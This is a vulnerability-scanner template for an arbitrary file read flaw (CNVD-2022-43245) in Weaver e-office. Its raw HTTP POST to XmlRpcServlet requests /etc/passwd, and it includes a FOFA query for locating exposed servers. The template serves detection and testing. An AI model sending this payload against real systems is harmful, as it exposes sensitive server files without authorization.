id: CNVD-2022-43245

info:
  name: Weaver OA XmlRpcServlet - Arbitary File Read
  author: SleepingBag945
  severity: high
  description: |
    e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
  metadata:
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
    verified: true
  tags: cnvd,cnvd2022,weaver,e-office,oa,lfi

http:
  - raw:
      - |
        POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?><methodCall>
        <methodName>WorkflowService.getAttachment</methodName>
        <params><param><value><string>/etc/passwd</string>
        </value></param></params></methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words :
          - "<methodResponse><params><param><value><base64>"

      - type: word
        part: header
        words :
          - "text/xml"

      - type: status
        status:
          - 200
